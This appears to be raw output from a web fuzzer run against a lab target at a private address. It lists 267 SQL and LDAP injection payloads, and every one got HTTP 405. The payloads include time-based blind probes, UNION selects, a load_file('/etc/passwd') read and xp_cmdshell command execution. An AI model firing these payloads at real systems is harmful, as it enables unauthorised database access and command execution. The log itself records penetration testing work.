Target: http://10.10.11.170:8080/
Total requests: 267
==================================================================
ID    Response   Lines      Word         Chars          Request    
==================================================================
00001:  C=405      0 L	       3 W	    111 Ch	  ")%20or%20('x'='x"
00003:  C=405      0 L	       3 W	    111 Ch	  "; execute immediate 'sel' || 'ect us' || 'er'"
00010:  C=405      0 L	       3 W	    111 Ch	  "delete"
00007:  C=405      0 L	       3 W	    111 Ch	  "1) or pg_sleep(__TIME__)--"
00009:  C=405      0 L	       3 W	    111 Ch	  ""hi"") or (""a""=""a""
00006:  C=405      0 L	       3 W	    111 Ch	  "";waitfor delay '0:0:__TIME__'--"
00008:  C=405      0 L	       3 W	    111 Ch	  "||(elt(-3+5,bin(15),ord(10),hex(char(45))))"
00005:  C=405      0 L	       3 W	    111 Ch	  "update"
00004:  C=405      0 L	       3 W	    111 Ch	  "benchmark(10000000,MD5(1))#"
00002:  C=405      0 L	       3 W	    111 Ch	  "%20or%201=1"
00020:  C=405      0 L	       3 W	    111 Ch	  "; exec xp_regread"
00011:  C=405      0 L	       3 W	    111 Ch	  "like"
00013:  C=405      0 L	       3 W	    111 Ch	  "pg_sleep(__TIME__)--"
00023:  C=405      0 L	       3 W	    111 Ch	  "1)) or benchmark(10000000,MD5(1))#"
00022:  C=405      0 L	       3 W	    111 Ch	  "@var select @var as var into temp end --"
00019:  C=405      0 L	       3 W	    111 Ch	  ") or ('a'='a"
00017:  C=405      0 L	       3 W	    111 Ch	  "insert"
00021:  C=405      0 L	       3 W	    111 Ch	  "*|"
00018:  C=405      0 L	       3 W	    111 Ch	  "1) or sleep(__TIME__)#"
00016:  C=405      0 L	       3 W	    111 Ch	  "or 0=0 #"
00015:  C=405      0 L	       3 W	    111 Ch	  "declare @q nvarchar (200) 0x730065006c00650063 ..."
00026:  C=405      0 L	       3 W	    111 Ch	  ""a"" or 3=3--""
00012:  C=405      0 L	       3 W	    111 Ch	  "" or sleep(__TIME__)#"
00014:  C=405      0 L	       3 W	    111 Ch	  "*(|(objectclass=*))"
00024:  C=405      0 L	       3 W	    111 Ch	  "asc"
00035:  C=405      0 L	       3 W	    111 Ch	  ") or sleep(__TIME__)='"
00036:  C=405      0 L	       3 W	    111 Ch	  ")) or benchmark(10000000,MD5(1))#"
00030:  C=405      0 L	       3 W	    111 Ch	  "1 waitfor delay '0:0:10'--"
00033:  C=405      0 L	       3 W	    111 Ch	  "or a = a"
00034:  C=405      0 L	       3 W	    111 Ch	  "UNION ALL SELECT"
00032:  C=405      0 L	       3 W	    111 Ch	  "hi or 1=1 --""
00025:  C=405      0 L	       3 W	    111 Ch	  "(||6)"
00029:  C=405      0 L	       3 W	    111 Ch	  "or 0=0 --"
00028:  C=405      0 L	       3 W	    111 Ch	  "# from wapiti"
00031:  C=405      0 L	       3 W	    111 Ch	  "or 'a'='a"
00027:  C=405      0 L	       3 W	    111 Ch	  "" or benchmark(10000000,MD5(1))#"
00039:  C=405      0 L	       3 W	    111 Ch	  "21 %"
00037:  C=405      0 L	       3 W	    111 Ch	  "hi' or 'a'='a"
00043:  C=405      0 L	       3 W	    111 Ch	  "")) or benchmark(10000000,MD5(1))#"
00049:  C=405      0 L	       3 W	    111 Ch	  "1;(load_file(char(47,101,116,99,47,112,97,115, ..."
00047:  C=405      0 L	       3 W	    111 Ch	  "));waitfor delay '0:0:__TIME__'--"
00048:  C=405      0 L	       3 W	    111 Ch	  "a' waitfor delay '0:0:10'--"
00046:  C=405      0 L	       3 W	    111 Ch	  "or 3=3"
00044:  C=405      0 L	       3 W	    111 Ch	  "PRINT"
00042:  C=405      0 L	       3 W	    111 Ch	  "or 2 > 1"
00045:  C=405      0 L	       3 W	    111 Ch	  "hi') or ('a'='a"
00041:  C=405      0 L	       3 W	    111 Ch	  "or 1=1"
00038:  C=405      0 L	       3 W	    111 Ch	  "0"
00040:  C=405      0 L	       3 W	    111 Ch	  "limit"
00050:  C=405      0 L	       3 W	    111 Ch	  "or%201=1"
00052:  C=405      0 L	       3 W	    111 Ch	  "or 1=1"
00056:  C=405      0 L	       3 W	    111 Ch	  "--"
00064:  C=405      0 L	       3 W	    111 Ch	  "&"
00080:  C=405      0 L	       3 W	    111 Ch	  "PRINT @@variable"
00098:  C=405      0 L	       3 W	    111 Ch	  "%20$(sleep%2050)"
00099:  C=405      0 L	       3 W	    111 Ch	  "1 or benchmark(10000000,MD5(1))#"
00097:  C=405      0 L	       3 W	    111 Ch	  "t'exec master..xp_cmdshell 'nslookup www.googl ..."
00096:  C=405      0 L	       3 W	    111 Ch	  "or (EXISTS)"
00094:  C=405      0 L	       3 W	    111 Ch	  ",@variable"
00095:  C=405      0 L	       3 W	    111 Ch	  "(sqlattempt2)"
00093:  C=405      0 L	       3 W	    111 Ch	  "union all select @@version--"
00092:  C=405      0 L	       3 W	    111 Ch	  "/**/or/**/1/**/=/**/1"
00091:  C=405      0 L	       3 W	    111 Ch	  "1)) or pg_sleep(__TIME__)--"
00090:  C=405      0 L	       3 W	    111 Ch	  "as"
00088:  C=405      0 L	       3 W	    111 Ch	  "0x770061006900740066006F0072002000640065006C00 ..."
00089:  C=405      0 L	       3 W	    111 Ch	  "%20'sleep%2050'"
00087:  C=405      0 L	       3 W	    111 Ch	  "and 1=( if((load_file(char(110,46,101,120,11 ..."
00083:  C=405      0 L	       3 W	    111 Ch	  "" or "a"="a"
00084:  C=405      0 L	       3 W	    111 Ch	  "(sqlvuln)"
00086:  C=405      0 L	       3 W	    111 Ch	  "or 1=1--"
00085:  C=405      0 L	       3 W	    111 Ch	  "x' AND members.email IS NULL; --"
00082:  C=405      0 L	       3 W	    111 Ch	  "26 %"
00079:  C=405      0 L	       3 W	    111 Ch	  ") union select * from information_schema.tables;"
00081:  C=405      0 L	       3 W	    111 Ch	  "or isNULL(1/0) /*"
00078:  C=405      0 L	       3 W	    111 Ch	  "or a=a"
00077:  C=405      0 L	       3 W	    111 Ch	  "%2A%28%7C%28objectclass%3D%2A%29%29"
00076:  C=405      0 L	       3 W	    111 Ch	  "or%201=1 --"
00074:  C=405      0 L	       3 W	    111 Ch	  ""));waitfor delay '0:0:__TIME__'--"
00075:  C=405      0 L	       3 W	    111 Ch	  "||6"
00073:  C=405      0 L	       3 W	    111 Ch	  "sqlvuln"
00072:  C=405      0 L	       3 W	    111 Ch	  "tz_offset"
00071:  C=405      0 L	       3 W	    111 Ch	  "declare @s varchar(200) select @s = 0x77616974 ..."
00068:  C=405      0 L	       3 W	    111 Ch	  "truncate"
00070:  C=405      0 L	       3 W	    111 Ch	  "\x27UNION SELECT"
00069:  C=405      0 L	       3 W	    111 Ch	  "1) or benchmark(10000000,MD5(1))#"
00067:  C=405      0 L	       3 W	    111 Ch	  "//"
00066:  C=405      0 L	       3 W	    111 Ch	  "or 'unusual' = 'unusual'"
00063:  C=405      0 L	       3 W	    111 Ch	  "x' AND email IS NULL; --"
00062:  C=405      0 L	       3 W	    111 Ch	  "" or pg_sleep(__TIME__)--"
00060:  C=405      0 L	       3 W	    111 Ch	  "; exec master..xp_cmdshell 'ping 172.10.1.255'--"
00061:  C=405      0 L	       3 W	    111 Ch	  "3.10E+17"
00065:  C=405      0 L	       3 W	    111 Ch	  "admin' or '"
00059:  C=405      0 L	       3 W	    111 Ch	  "exec xp"
00058:  C=405      0 L	       3 W	    111 Ch	  "declare @s varchar (200) select @s = 0x73656c6 ..."
00055:  C=405      0 L	       3 W	    111 Ch	  "or 'text' = n'text'"
00057:  C=405      0 L	       3 W	    111 Ch	  "or 1=1 or ''='"
00054:  C=405      0 L	       3 W	    111 Ch	  "or '7659'='7659"
00051:  C=405      0 L	       3 W	    111 Ch	  "1 or sleep(__TIME__)#"
00053:  C=405      0 L	       3 W	    111 Ch	  "and 1 in (select var from temp)--"
00100:  C=405      0 L	       3 W	    111 Ch	  "%20or%20''='"
00102:  C=405      0 L	       3 W	    111 Ch	  "or pg_sleep(__TIME__)--"
00106:  C=405      0 L	       3 W	    111 Ch	  "; begin declare @var varchar(8000) set @var=' ..."
00114:  C=405      0 L	       3 W	    111 Ch	  "a' or 1=1--"
00122:  C=405      0 L	       3 W	    111 Ch	  "or 1 --'"
00123:  C=405      0 L	       3 W	    111 Ch	  "or 0=0 #""
00121:  C=405      0 L	       3 W	    111 Ch	  "or sleep(__TIME__)='"
00120:  C=405      0 L	       3 W	    111 Ch	  "|"
00119:  C=405      0 L	       3 W	    111 Ch	  "or '1'='1"
00118:  C=405      0 L	       3 W	    111 Ch	  "or a=a--"
00117:  C=405      0 L	       3 W	    111 Ch	  "or 2 between 1 and 3"
00113:  C=405      0 L	       3 W	    111 Ch	  "select * from information_schema.tables--"
00116:  C=405      0 L	       3 W	    111 Ch	  "declare @s varchar(22) select @s ="
00115:  C=405      0 L	       3 W	    111 Ch	  "a' or 'a' = 'a"
00112:  C=405      0 L	       3 W	    111 Ch	  "or sleep(__TIME__)#"
00111:  C=405      0 L	       3 W	    111 Ch	  "union select"
00110:  C=405      0 L	       3 W	    111 Ch	  ") or pg_sleep(__TIME__)--"
00105:  C=405      0 L	       3 W	    111 Ch	  "or 'whatever' in ('whatever')"
00108:  C=405      0 L	       3 W	    111 Ch	  "0x77616974666F722064656C61792027303A303A313027 ..."
00109:  C=405      0 L	       3 W	    111 Ch	  "exec(@s)"
00107:  C=405      0 L	       3 W	    111 Ch	  "union select 1,load_file('/etc/passwd'),1,1,1;"
00104:  C=405      0 L	       3 W	    111 Ch	  "") or sleep(__TIME__)=""
00101:  C=405      0 L	       3 W	    111 Ch	  "||UTL_HTTP.REQUEST"
00103:  C=405      0 L	       3 W	    111 Ch	  "hi' or 'x'='x';"
00124:  C=405      0 L	       3 W	    111 Ch	  "having"
00126:  C=405      0 L	       3 W	    111 Ch	  "" or isNULL(1/0) /*"
00130:  C=405      0 L	       3 W	    111 Ch	  "order by"
00147:  C=405      0 L	       3 W	    111 Ch	  "; exec master..xp_cmdshell"
00138:  C=405      0 L	       3 W	    111 Ch	  "*/*"
00145:  C=405      0 L	       3 W	    111 Ch	  "group by userid having 1=1--"
00146:  C=405      0 L	       3 W	    111 Ch	  "or ''='"
00144:  C=405      0 L	       3 W	    111 Ch	  "-- &password="
00142:  C=405      0 L	       3 W	    111 Ch	  "");waitfor delay '0:0:__TIME__'--"
00143:  C=405      0 L	       3 W	    111 Ch	  "a' or 3=3--"
00141:  C=405      0 L	       3 W	    111 Ch	  "or benchmark(10000000,MD5(1))#"
00140:  C=405      0 L	       3 W	    111 Ch	  "(select top 1"
00139:  C=405      0 L	       3 W	    111 Ch	  "or 'text' > 't'"
00137:  C=405      0 L	       3 W	    111 Ch	  "x' AND userid IS NULL; --"
00136:  C=405      0 L	       3 W	    111 Ch	  "" or 1=1--"
00135:  C=405      0 L	       3 W	    111 Ch	  ";waitfor delay '0:0:__TIME__'--"
00134:  C=405      0 L	       3 W	    111 Ch	  "or username like char(37);"
00133:  C=405      0 L	       3 W	    111 Ch	  ") or benchmark(10000000,MD5(1))#"
00132:  C=405      0 L	       3 W	    111 Ch	  "having 1=1--"
00131:  C=405      0 L	       3 W	    111 Ch	  "bfilename"
00129:  C=405      0 L	       3 W	    111 Ch	  "char%4039%41%2b%40SELECT"
00128:  C=405      0 L	       3 W	    111 Ch	  "‘ or 1=1 --"
00125:  C=405      0 L	       3 W	    111 Ch	  "a'"
00127:  C=405      0 L	       3 W	    111 Ch	  "declare @s varchar (8000) select @s = 0x73656c ..."
00148:  C=405      0 L	       3 W	    111 Ch	  "%20or%20x=x"
00150:  C=405      0 L	       3 W	    111 Ch	  "")) or sleep(__TIME__)=""
00154:  C=405      0 L	       3 W	    111 Ch	  "%20or%20'x'='x"
00169:  C=405      0 L	       3 W	    111 Ch	  "&apos;%20OR"
00170:  C=405      0 L	       3 W	    111 Ch	  "; or '1'='1'"
00162:  C=405      0 L	       3 W	    111 Ch	  ") or (a=a"
00167:  C=405      0 L	       3 W	    111 Ch	  "%7C"
00168:  C=405      0 L	       3 W	    111 Ch	  "x' AND 1=(SELECT COUNT(*) FROM tabname); --"
00166:  C=405      0 L	       3 W	    111 Ch	  ")) or pg_sleep(__TIME__)--"
00165:  C=405      0 L	       3 W	    111 Ch	  "%27%20or%201=1"
00161:  C=405      0 L	       3 W	    111 Ch	  "0 or 1=1"
00164:  C=405      0 L	       3 W	    111 Ch	  "replace"
00163:  C=405      0 L	       3 W	    111 Ch	  "uni/**/on sel/**/ect"
00160:  C=405      0 L	       3 W	    111 Ch	  "1 or pg_sleep(__TIME__)--"
00159:  C=405      0 L	       3 W	    111 Ch	  "ý or 1=1 --"
00157:  C=405      0 L	       3 W	    111 Ch	  "29 %"
00156:  C=405      0 L	       3 W	    111 Ch	  "exec sp"
00158:  C=405      0 L	       3 W	    111 Ch	  "("
00155:  C=405      0 L	       3 W	    111 Ch	  "or 'something' = 'some'+'thing'"
00153:  C=405      0 L	       3 W	    111 Ch	  "") or pg_sleep(__TIME__)--"
00152:  C=405      0 L	       3 W	    111 Ch	  "hi' or 1=1 --"
00149:  C=405      0 L	       3 W	    111 Ch	  "select"
00151:  C=405      0 L	       3 W	    111 Ch	  "0x730065006c0065006300740020004000400076006500 ..."
00171:  C=405      0 L	       3 W	    111 Ch	  "declare @q nvarchar (200) select @q = 0x770061 ..."
00173:  C=405      0 L	       3 W	    111 Ch	  "; exec ('sel' + 'ect us' + 'er')"
00177:  C=405      0 L	       3 W	    111 Ch	  "declare @q nvarchar (4000) select @q ="
00193:  C=405      0 L	       3 W	    111 Ch	  "%2A%28%7C%28mail%3D%2A%29%29"
00185:  C=405      0 L	       3 W	    111 Ch	  "hi or a=a"
00192:  C=405      0 L	       3 W	    111 Ch	  "UNION SELECT"
00191:  C=405      0 L	       3 W	    111 Ch	  "") or benchmark(10000000,MD5(1))#"
00190:  C=405      0 L	       3 W	    111 Ch	  "to_timestamp_tz"
00189:  C=405      0 L	       3 W	    111 Ch	  ");waitfor delay '0:0:__TIME__'--"
00187:  C=405      0 L	       3 W	    111 Ch	  "password:*/=1--"
00188:  C=405      0 L	       3 W	    111 Ch	  "distinct"
00184:  C=405      0 L	       3 W	    111 Ch	  "select name from syscolumns where id = (sele ..."
00186:  C=405      0 L	       3 W	    111 Ch	  "*(|(mail=*))"
00182:  C=405      0 L	       3 W	    111 Ch	  "1)) or sleep(__TIME__)#"
00183:  C=405      0 L	       3 W	    111 Ch	  "or 0=0 #"
00181:  C=405      0 L	       3 W	    111 Ch	  ")"
00180:  C=405      0 L	       3 W	    111 Ch	  "||'6"
00179:  C=405      0 L	       3 W	    111 Ch	  "desc"
00176:  C=405      0 L	       3 W	    111 Ch	  "anything' OR 'x'='x"
00175:  C=405      0 L	       3 W	    111 Ch	  "/"
00178:  C=405      0 L	       3 W	    111 Ch	  "or 0=0 --"
00172:  C=405      0 L	       3 W	    111 Ch	  "1 or 1=1"
00194:  C=405      0 L	       3 W	    111 Ch	  "+sqlvuln"
00174:  C=405      0 L	       3 W	    111 Ch	  "23 OR 1=1"
00200:  C=405      0 L	       3 W	    111 Ch	  "union select * from users where login = char ..."
00196:  C=405      0 L	       3 W	    111 Ch	  ")) or sleep(__TIME__)='"
00217:  C=405      0 L	       3 W	    111 Ch	  "declare @s varchar(200) select @s = 0x77616974666F722064656C61792027303A303A31302700 exec(@s)"
00208:  C=405      0 L	       3 W	    111 Ch	  "%2A%7C"
00216:  C=405      0 L	       3 W	    111 Ch	  "declare @q nvarchar (200) select @q = 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A0031003000270000 exec(@q)"
00215:  C=405      0 L	       3 W	    111 Ch	  "or a = a"
00218:  C=405      0 L	       3 W	    111 Ch	  "declare @q nvarchar (200) 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)"
00214:  C=405      0 L	       3 W	    111 Ch	  "'"
00212:  C=405      0 L	       3 W	    111 Ch	  "or 1/*"
00219:  C=405      0 L	       3 W	    111 Ch	  "declare @s varchar (200) select @s = 0x73656c65637420404076657273696f6e exec(@s)"
00213:  C=405      0 L	       3 W	    111 Ch	  "!"
00207:  C=405      0 L	       3 W	    111 Ch	  "//*"
00211:  C=405      0 L	       3 W	    111 Ch	  "?"
00205:  C=405      0 L	       3 W	    111 Ch	  "or '1'='1'--"
00209:  C=405      0 L	       3 W	    111 Ch	  "" or 0=0 --"
00206:  C=405      0 L	       3 W	    111 Ch	  ""a"" or 1=1--""
00204:  C=405      0 L	       3 W	    111 Ch	  "@variable"
00210:  C=405      0 L	       3 W	    111 Ch	  "")) or pg_sleep(__TIME__)--"
00203:  C=405      0 L	       3 W	    111 Ch	  "‘ or 3=3 --"
00220:  C=405      0 L	       3 W	    111 Ch	  "' or 1=1"
00202:  C=405      0 L	       3 W	    111 Ch	  "28 %"
00201:  C=405      0 L	       3 W	    111 Ch	  "x' or 1=1 or 'x'='y"
00199:  C=405      0 L	       3 W	    111 Ch	  "sqlvuln;"
00222:  C=405      0 L	       3 W	    111 Ch	  "x' OR full_name LIKE '%Bob%"
00198:  C=405      0 L	       3 W	    111 Ch	  "or 1 in (select @@version)--"
00197:  C=405      0 L	       3 W	    111 Ch	  "or 1=1 or ""="
00223:  C=405      0 L	       3 W	    111 Ch	  "'; exec master..xp_cmdshell 'ping 172.10.1.255'--"
00224:  C=405      0 L	       3 W	    111 Ch	  "'%20or%20''='"
00221:  C=405      0 L	       3 W	    111 Ch	  " or 1=1 --"
00195:  C=405      0 L	       3 W	    111 Ch	  "or 1=1 /*"
00225:  C=405      0 L	       3 W	    111 Ch	  "'%20or%20'x'='x"
00227:  C=405      0 L	       3 W	    111 Ch	  "' or 0=0 --"
00226:  C=405      0 L	       3 W	    111 Ch	  "')%20or%20('x'='x"
00229:  C=405      0 L	       3 W	    111 Ch	  "or 0=0 #""
00241:  C=405      0 L	       3 W	    111 Ch	  "procedure"
00249:  C=405      0 L	       3 W	    111 Ch	  "'; exec xp_regread"
00233:  C=405      0 L	       3 W	    111 Ch	  "or 1=1--"
00250:  C=405      0 L	       3 W	    111 Ch	  "t'exec master..xp_cmdshell 'nslookup www.google.com'--"
00248:  C=405      0 L	       3 W	    111 Ch	  "'; exec master..xp_cmdshell"
00247:  C=405      0 L	       3 W	    111 Ch	  "' or user like '%"
00246:  C=405      0 L	       3 W	    111 Ch	  "' or uid like '%"
00245:  C=405      0 L	       3 W	    111 Ch	  "' or userid like '%"
00244:  C=405      0 L	       3 W	    111 Ch	  "' or uname like '%"
00243:  C=405      0 L	       3 W	    111 Ch	  "' or username like '%"
00240:  C=405      0 L	       3 W	    111 Ch	  "or"
00242:  C=405      0 L	       3 W	    111 Ch	  "handler"
00239:  C=405      0 L	       3 W	    111 Ch	  "'hi' or 'x'='x';"
00238:  C=405      0 L	       3 W	    111 Ch	  "') or ('a'='a"
00237:  C=405      0 L	       3 W	    111 Ch	  "or a=a"
00236:  C=405      0 L	       3 W	    111 Ch	  "' or a=a--"
00235:  C=405      0 L	       3 W	    111 Ch	  "or 1=1 or ""="
00232:  C=405      0 L	       3 W	    111 Ch	  "' or 1 --'"
00234:  C=405      0 L	       3 W	    111 Ch	  "' or 1=1 or ''='"
00231:  C=405      0 L	       3 W	    111 Ch	  "' or '1'='1'--"
00228:  C=405      0 L	       3 W	    111 Ch	  "' or 0=0 #"
00230:  C=405      0 L	       3 W	    111 Ch	  "' or 1=1--"
00251:  C=405      0 L	       3 W	    111 Ch	  "--sp_password"
00253:  C=405      0 L	       3 W	    111 Ch	  "' UNION ALL SELECT"
00257:  C=405      0 L	       3 W	    111 Ch	  "1;SELECT%20*"
00265:  C=405      0 L	       3 W	    111 Ch	  "' or ''='"
00264:  C=405      0 L	       3 W	    111 Ch	  "%21"
00267:  C=405      0 L	       3 W	    111 Ch	  " or 3=3 --"
00266:  C=405      0 L	       3 W	    111 Ch	  "' or 3=3"
00256:  C=405      0 L	       3 W	    111 Ch	  "'||UTL_HTTP.REQUEST"
00262:  C=405      0 L	       3 W	    111 Ch	  "%29"
00263:  C=405      0 L	       3 W	    111 Ch	  "%26"
00260:  C=405      0 L	       3 W	    111 Ch	  "'sqlattempt1"
00259:  C=405      0 L	       3 W	    111 Ch	  "'%20or%201=1"
00258:  C=405      0 L	       3 W	    111 Ch	  "<>"'%;)(&+"
00261:  C=405      0 L	       3 W	    111 Ch	  "%28"
00254:  C=405      0 L	       3 W	    111 Ch	  "' or (EXISTS)"
00252:  C=405      0 L	       3 W	    111 Ch	  "' UNION SELECT"
00255:  C=405      0 L	       3 W	    111 Ch	  "' (select top 1"

Total time: 0
Processed Requests: 267
Filtered Requests: 0
Requests/sec.: 0
